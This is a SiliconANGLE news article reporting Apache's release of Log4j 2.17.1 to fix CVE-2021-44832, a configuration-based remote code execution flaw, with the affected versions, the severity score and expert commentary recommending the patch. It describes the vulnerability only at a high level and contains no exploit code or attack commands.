SECURITY
SECURITY
SECURITY
Apache releases Log4j patch to address new RCE vulnerability
The Apache Software Foundation has released a new patch for Log4j, the Java-based logging utility that has seen vulnerabilities targeted en masse by hackers since Dec. 13.
Log4j 2.17.1, the fifth update this month, addresses a new remote code execution vulnerability found in 2.17.0. CVE-2021-44832 allows an attacker with permission to modify the logging configuration file to construct a malicious configuration that allows for remote code execution. The vulnerability affects all versions of Log4j from 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4.
The new vulnerability has been fixed by limiting JDNI data source names to the Java protocol in Log4j version 2.17.1 along with patches for earlier releases, 2.12.4 for Java 8 and 2.3.2 for Java 6.
The vulnerability has a Common Vulnerability Scoring System score of 6.6. As researchers at Snyk Ltd. noted today, it’s not as bad as it sounds, although they added that those running Log4j should apply the new patches.
“The Log4j CVE being released today requires a fairly obscure set of conditions to trigger,” Casey Ellis, founder and chief technology officer at crowdsourced security company Bugcrowd Inc., told SiliconANGLE. “So, while it’s important for people to keep an eye out for newly released CVEs for situational awareness, this CVE doesn’t appear to increase the already elevated risk of compromise via Log4j.”
Ellis explained that the vulnerability appears to have been discovered through the use of static code analysis tools in conjunction with manual review/exploit development. “As a logging library, Log4j is inherently flexible in terms of how data can be passed to it — each of these points of interaction is a potential vector for exploitation,” Ellis noted. “Many eyes are currently scouring Log4j, so it’s fairly safe to expect more of this type of vulnerability announcement over the coming weeks. In the interest of staying as up-to-date as possible with Log4j — especially if the configurations required for exploiting CVE-2021-44832 — patching to 2.17.1 is a good idea.”
Image: Apache
A message from John Furrier, co-founder of SiliconANGLE:
Support our open free content by sharing and engaging with our content and community.
Join theCUBE Alumni Trust Network
Where Technology Leaders Connect, Share Intelligence & Create Opportunities
11.4k+
CUBE Alumni Network
C-level and Technical
Domain Experts
15M+
theCUBE
Viewers
Connect with 11,413+ industry leaders from our network of tech and business leaders forming a unique trusted network effect.
SiliconANGLE Media is a recognized leader in digital media innovation serving innovative audiences and brands, bringing together cutting-edge technology, influential content, strategic insights and real-time audience engagement. As the parent company of SiliconANGLE, theCUBE Network, theCUBE Research, CUBE365, theCUBE AI and theCUBE SuperStudios — such as those established in Silicon Valley and the New York Stock Exchange (NYSE) — SiliconANGLE Media operates at the intersection of media, technology, and AI. .
Founded by tech visionaries John Furrier and Dave Vellante, SiliconANGLE Media has built a powerful ecosystem of industry-leading digital media brands, with a reach of 15+ million elite tech professionals. The company’s new, proprietary theCUBE AI Video cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.
